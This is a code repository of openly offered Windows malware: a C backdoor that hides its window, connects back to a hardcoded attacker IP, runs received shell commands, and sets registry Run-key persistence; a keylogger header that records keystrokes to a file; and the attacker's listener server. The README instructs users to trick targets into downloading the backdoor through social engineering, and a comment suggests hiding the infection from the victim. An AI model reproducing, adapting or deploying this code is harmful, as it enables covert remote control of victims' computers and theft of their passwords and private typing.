├── Backdoor.c ├── Keylogger.h ├── LICENSE ├── README.md └── Server.c /Backdoor.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "keylogger.h" 13 | 14 | #define bzero(p, size) (void) memset((p), 0, (size)) 15 | 16 | int sock; 17 | 18 | 19 | int bootRun() 20 | { 21 | char err[128] = "Failed\n"; 22 | char suc[128] = "Created Persistence At : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n"; 23 | TCHAR szPath[MAX_PATH]; 24 | DWORD pathLen = 0; 25 | 26 | pathLen = GetModuleFileName(NULL, szPath, MAX_PATH); 27 | if (pathLen == 0) { 28 | send(sock, err, sizeof(err), 0); 29 | return -1; 30 | } 31 | 32 | HKEY NewVal; 33 | 34 | if (RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), &NewVal) != ERROR_SUCCESS) { 35 | send(sock, err, sizeof(err), 0); 36 | return -1; 37 | } 38 | DWORD pathLenInBytes = pathLen * sizeof(*szPath); 39 | if (RegSetValueEx(NewVal, TEXT("Hacked"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes) != ERROR_SUCCESS) { 40 | RegCloseKey(NewVal); 41 | send(sock, err, sizeof(err), 0); 42 | return -1; 43 | } 44 | RegCloseKey(NewVal); 45 | send(sock, suc, sizeof(suc), 0); 46 | return 0; 47 | } 48 | 49 | 50 | char * 51 | str_cut(char str[], int slice_from, int slice_to) 52 | { 53 | if (str[0] == '\0') 54 | return NULL; 55 | 56 | char *buffer; 57 | size_t str_len, buffer_len; 58 | 59 | if (slice_to < 0 && slice_from > slice_to) { 60 | str_len = strlen(str); 61 | if (abs(slice_to) > str_len - 1) 62 | return NULL; 63 | 64 | if (abs(slice_from) > str_len) 65 | slice_from = (-1) * str_len; 66 | 67 | buffer_len = slice_to - slice_from; 68 | str += (str_len + slice_from); 69 | 70 | } else if (slice_from >= 0 && slice_to > slice_from) { 71 | str_len = strlen(str); 72 | 73 | if (slice_from > str_len - 1) 74 | return NULL; 75 | buffer_len = slice_to - slice_from; 76 | str += slice_from; 77 | 78 | } else 79 | return NULL; 80 | 81 | buffer = calloc(buffer_len, sizeof(char)); 82 | strncpy(buffer, str, buffer_len); 83 | return buffer; 84 | } 85 | 86 | void Shell() { 87 | char buffer[1024]; 88 | char container[1024]; 89 | char total_response[18384]; 90 | 91 | 92 | while (1) { 93 | jump: 94 | bzero(buffer,1024); 95 | bzero(container, sizeof(container)); 96 | bzero(total_response, sizeof(total_response)); 97 | recv(sock, buffer, 1024, 0); 98 | 99 | if (strncmp("q", buffer, 1) == 0) { 100 | closesocket(sock); 101 | WSACleanup(); 102 | exit(0); 103 | } 104 | else if (strncmp("cd ", buffer, 3) == 0) { 105 | chdir(str_cut(buffer,3,100)); 106 | } 107 | else if (strncmp("persist", buffer, 7) == 0) { 108 | bootRun(); 109 | } 110 | else if (strncmp("keylog_start", buffer, 12) == 0) { 111 | HANDLE thread = CreateThread(NULL, 0,logg, NULL, 0, NULL); 112 | goto jump; 113 | } 114 | else { 115 | FILE *fp; 116 | fp = _popen(buffer, "r"); 117 | while(fgets(container,1024,fp) != NULL) { 118 | strcat(total_response, container); 119 | } 120 | send(sock, total_response, sizeof(total_response), 0); 121 | fclose(fp); 122 | } 123 | 124 | } 125 | 126 | } 127 | 128 | 129 | int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow){ 130 | 131 | HWND stealth; 132 | AllocConsole(); 133 | stealth = FindWindowA("ConsoleWindowClass", NULL); 134 | 135 | ShowWindow(stealth, 0); 136 | 137 | struct sockaddr_in ServAddr; 138 | unsigned short ServPort; 139 | char *ServIP; 140 | WSADATA wsaData; 141 | 142 | ServIP = "192.168.1.6"; 143 | ServPort = 50005; 144 | 145 | if (WSAStartup(MAKEWORD(2,0), &wsaData) != 0) { 146 | exit(1); 147 | } 148 | 149 | sock = socket(AF_INET, SOCK_STREAM, 0); 150 | 151 | memset(&ServAddr, 0, sizeof(ServAddr)); 152 | ServAddr.sin_family = AF_INET; 153 | ServAddr.sin_addr.s_addr = inet_addr(ServIP); 154 | ServAddr.sin_port = htons(ServPort); 155 | 156 | 157 | start: 158 | while (connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0) 159 | { 160 | Sleep(10); 161 | goto start; 162 | } 163 | MessageBox(NULL, TEXT("Your Device Has Been Hacked!!!"), TEXT("Windows Installer"), MB_OK | MB_ICONERROR); //You Can Remove this if you don't want your Target to Know.. 164 | Shell(); 165 | } 166 | 167 | 168 | 169 | 170 | 171 | // Created By Avinash Kumar Ranjan -------------------------------------------------------------------------------- /Keylogger.h: -------------------------------------------------------------------------------- 1 | DWORD WINAPI logg(){ 2 | int vkey,last_key_state[0xFF]; 3 | int isCAPSLOCK,isNUMLOCK; 4 | int isL_SHIFT,isR_SHIFT; 5 | int isPressed; 6 | char showKey; 7 | char NUMCHAR[]=")!@#$%^&*("; 8 | char chars_vn[]=";=,-./`"; 9 | char chars_vs[]=":+<_>?~"; 10 | char chars_va[]="[\\]\';"; 11 | char chars_vb[]="{|}\""; 12 | FILE *kh; 13 | char KEY_LOG_FILE[]="windows.txt"; 14 | //: making last key state 0 15 | for(vkey=0;vkey<0xFF;vkey++){ 16 | last_key_state[vkey]=0; 17 | } 18 | 19 | //: running infinite 20 | while(1){ 21 | //: take rest for 10 millisecond 22 | Sleep(10); 23 | 24 | //: get key state of CAPSLOCK,NUMLOCK 25 | //: and LEFT_SHIFT/RIGHT_SHIFT 26 | isCAPSLOCK=(GetKeyState(0x14)&0xFF)>0?1:0; 27 | isNUMLOCK=(GetKeyState(0x90)&0xFF)>0?1:0; 28 | isL_SHIFT=(GetKeyState(0xA0)&0xFF00)>0?1:0; 29 | isR_SHIFT=(GetKeyState(0xA1)&0xFF00)>0?1:0; 30 | 31 | //: cheking state of all virtual keys 32 | for(vkey=0;vkey<0xFF;vkey++){ 33 | isPressed=(GetKeyState(vkey)&0xFF00)>0?1:0; 34 | showKey=(char)vkey; 35 | if(isPressed==1 && last_key_state[vkey]==0){ 36 | 37 | //: for alphabets 38 | if(vkey>=0x41 && vkey<=0x5A){ 39 | if(isCAPSLOCK==0){ 40 | if(isL_SHIFT==0 && isR_SHIFT==0){ 41 | showKey=(char)(vkey+0x20); 42 | } 43 | } 44 | else if(isL_SHIFT==1 || isR_SHIFT==1){ 45 | showKey=(char)(vkey+0x20); 46 | } 47 | } 48 | 49 | //: for num chars 50 | else if(vkey>=0x30 && vkey<=0x39){ 51 | if(isL_SHIFT==1 || isR_SHIFT==1){ 52 | showKey=NUMCHAR[vkey-0x30]; 53 | } 54 | } 55 | 56 | //: for right side numpad 57 | else if(vkey>=0x60 && vkey<=0x69 && isNUMLOCK==1){ 58 | showKey=(char)(vkey-0x30); 59 | } 60 | 61 | //: for printable chars 62 | else if(vkey>=0xBA && vkey<=0xC0){ 63 | if(isL_SHIFT==1 || isR_SHIFT==1){ 64 | showKey=chars_vs[vkey-0xBA]; 65 | } 66 | else{ 67 | showKey=chars_vn[vkey-0xBA]; 68 | } 69 | } 70 | else if(vkey>=0xDB && vkey<=0xDF){ 71 | if(isL_SHIFT==1 || isR_SHIFT==1){ 72 | showKey=chars_vb[vkey-0xDB]; 73 | } 74 | else{ 75 | showKey=chars_va[vkey-0xDB]; 76 | } 77 | } 78 | 79 | //: for right side chars ./*-+.. 80 | //: for chars like space,\n,enter etc.. 81 | //: for enter use newline char 82 | //: don't print other keys 83 | else if(vkey==0x0D){ 84 | showKey=(char)0x0A; 85 | } 86 | else if(vkey>=0x6A && vkey<=0x6F){ 87 | showKey=(char)(vkey-0x40); 88 | } 89 | else if(vkey!=0x20 && vkey!=0x09){ 90 | showKey=(char)0x00; 91 | } 92 | 93 | //:print_and_save_captured_key 94 | if(showKey!=(char)0x00){ 95 | kh=fopen(KEY_LOG_FILE,"a"); 96 | putc(showKey,kh); 97 | fclose(kh); 98 | } 99 | } 100 | //: save last state of key 101 | last_key_state[vkey]=isPressed; 102 | } 103 | 104 | 105 | }//;end_of_while_loop 106 | }//;end_of_main_function 107 | 108 | 109 | // Created By Avinash Kumar Ranjan ;) 110 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Avinash Kumar Ranjan 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![Malware-with-Backdoor-and-Keylogger](https://socialify.git.ci/avinashkranjan/Malware-with-Backdoor-and-Keylogger/image?description=1&font=KoHo&forks=1&issues=1&language=1&owner=1&pattern=Circuit%20Board&pulls=1&stargazers=1&theme=Light) 2 | 3 | Here are the Instructions 4 | 5 | 6 | ### Step 1: 7 | Use Social Engineering to Manipulate the backdoor file and make the target download it. 8 | 9 | ### Step 2: 10 | Use the compiled Server.c file on your system to then access target's system 11 | 12 |

Happy Hacking 👨🏻‍💻

13 | -------------------------------------------------------------------------------- /Server.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | int main() 12 | { 13 | int sock, client_socket; 14 | char buffer[1024]; 15 | char response[18384]; 16 | struct sockaddr_in server_address, client_address; 17 | int i=0; 18 | int optval = 1; 19 | socklen_t client_length; 20 | 21 | sock = socket(AF_INET, SOCK_STREAM, 0); 22 | 23 | if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)) < 0) { 24 | printf("Error Setting TCP Socket Options!\n"); 25 | return 1; 26 | } 27 | 28 | server_address.sin_family = AF_INET; 29 | server_address.sin_addr.s_addr = inet_addr("192.168.1.6"); // Check and Change the IP as per your requirements 30 | server_address.sin_port = htons(50005); 31 | 32 | bind(sock, (struct sockaddr *) &server_address, sizeof(server_address)); 33 | listen(sock, 5); 34 | client_length = sizeof(client_address); 35 | client_socket = accept(sock, (struct sockaddr *) &client_address, &client_length); 36 | 37 | while(1) 38 | { 39 | jump: 40 | bzero(&buffer, sizeof(buffer)); 41 | bzero(&response, sizeof(response)); 42 | printf("* Shell#%s~$: ", inet_ntoa(client_address.sin_addr)); 43 | fgets(buffer, sizeof(buffer), stdin); 44 | strtok(buffer, "\n"); 45 | write(client_socket, buffer, sizeof(buffer)); 46 | if (strncmp("q", buffer, 1) == 0) { 47 | break; 48 | } 49 | else if (strncmp("cd ", buffer, 3) == 0) { 50 | goto jump; 51 | } 52 | else if (strncmp("keylog_start", buffer, 12) == 0) { 53 | goto jump; 54 | } 55 | else if (strncmp("persist", buffer, 7) == 0) { 56 | recv(client_socket, response, sizeof(response), 0); 57 | printf("%s", response); 58 | } 59 | else { 60 | recv(client_socket, response, sizeof(response), MSG_WAITALL); 61 | printf("%s", response); 62 | } 63 | 64 | } 65 | 66 | } 67 | 68 | 69 | // Created By Avinash Kumar Ranjan --------------------------------------------------------------------------------